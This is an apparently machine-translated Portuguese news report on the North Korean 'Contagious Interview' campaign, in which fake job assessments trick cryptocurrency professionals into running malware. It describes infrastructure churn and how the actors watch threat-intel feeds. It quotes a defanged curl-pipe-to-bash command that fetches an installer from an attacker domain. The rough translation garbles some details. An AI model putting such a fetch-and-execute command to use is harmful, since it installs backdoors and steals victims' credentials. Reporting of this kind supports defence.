No ano passado, os pesquisadores de segurança cibernética observaram um aumento na atividade dos atores de ameaças norte-coreanas que alavancam técnicas de engenharia social de nível militar para atingir profissionais da indústria de criptomoedas.
Esta campanha, apelidada de entrevista contagiosa, emprega um processo enganosamente benigno de aplicação de empregos que mascara a entrega de malware sofisticado.
As vítimas recebem convites para participar de avaliações simuladas para funções em empresas fictícias, apenas para serem atraídas para a execução de roteiros maliciosos.
Os invasores mantêm uma vasta rede de infraestrutura, substituindo rapidamente domínios e servidores comprometidos para fugir de quedas e sustentarem altos níveis de engajamento.
No início de 2025, os adversários começaram a registrar domínios com nomes como SkillQuestions (.) Com e TalentCheck (.) Pro, configurando sites de isenção que levam os candidatos a executar comandos de shell sob o disfarce de solucionar erros.
Durante a avaliação, aparece um erro na página-normalmente um prompt de acesso à câmera-que instrui as vítimas a colar um comando Curl em seu terminal.
Esta etapa simples de download da carga útil aumenta rapidamente para um compromisso completo, pois o malware estabelece acesso persistente e exfiltrações de credenciais.
A orquestração cuidadosa dessas etapas combinada com nomes de domínio personalizada levou a mais de 230 compromissos de vítimas confirmados dentro de um período de três meses.
Os analistas do Sentinellabs observaram que essas operações são sustentadas pelo monitoramento contínuo de plataformas de inteligência de ameaças, como Validin e Virustottal.
Ao registrar contas da comunidade logo após os novos indicadores de compromisso (IOCs) são publicados em repositórios como o apt_lazarus (.) TXT de Maltrail, os adversários garantem que eles tenham as últimas informações sobre sua própria exposição à infraestrutura.
Em vez de investir em modificações abrangentes em ativos existentes, eles optam por aumentar os servidores inteiramente novos sempre que um domínio enfrenta a interrupção.
Essa escolha estratégica favorece a agilidade operacional sobre as defesas no estilo da fortaleza, permitindo que os atores permaneçam um passo à frente dos pedidos de remoção.
Os pesquisadores do Sentinellabs identificaram que o ciclo de substituição da infraestrutura é medido em horas e não semanas.
Quando um provedor de serviços desativa um domínio, os atores da ameaça imediatamente provisionam um novo domínio, migram seus servidores de distribuição de malware e atualizam os pontos de extremidade de comando e controle.
O Liambrooksman Persona (Brooksliam534 (@) gmail.com) rastreado como mantenedor de cors-app e cors-parser (fonte-setinelone)
Nos bastidores, a coordenação ocorre através de plataformas de colaboração de equipes como o Slack, onde os bots automatizados pós -resumos de novos domínios e operadores individuais clicam nessas visualizações em rápida sucessão.
Mecanismo de infecção
No coração da campanha de entrevista contagiosa, existe um mecanismo de infecção minimalista e eficaz.
Ao visitar o local de atração, os alvos encontram uma forma movida a JavaScript que simula uma avaliação de codificação ao vivo.
Quando eles acionam o erro fabricado, a página exibe um comando de terminal:-
Curl – S HTTPS (:) // API (.) Release de acionamento (.) Cloud/Update (.) SH | Bash
A execução deste comando busca um script de shell que executa verificações de ambiente, detecta o sistema operacional da vítima e baixa uma carga útil personalizada.
O script instala um backdoor leve, escreve uma entrada de cron para persistência e se comunica com o servidor C2 controlado por ator sobre o HTTPS para registrar o host comprometido.
Todas as etapas são registradas pelo aplicativo JS do Nó ContagiousDrop (.) No servidor, criando registros detalhados de vitimologia em arquivos JSON, como client_ips_start_test (.) JSON.
Loging para client_ips_start_test (.) Json (fonte – setinelone)
Essa mistura de engenharia social e script automatizada maximiza as taxas de infecção ao minimizar o esforço do desenvolvedor, refletindo uma maturação das capacidades ofensivas da RPDC.
Através dessas táticas adaptativas-a rotatividade de infraestrutura ráides, o escotismo de ativos orientado por inteligência e a entrega da carga útil simplificada-os atores de ameaças coreanos continuam a representar uma ameaça dinâmica e persistente.
À medida que os defensores fortalecem os protocolos de detecção, entender esse mecanismo de infecção permanece crucial para interromper a cadeia de ataque antes do contato inicial.
Aumente seu SoC e ajude sua equipe a proteger sua empresa com inteligência de ameaças de primeira linha: solicite um teste premium de pesquisa.
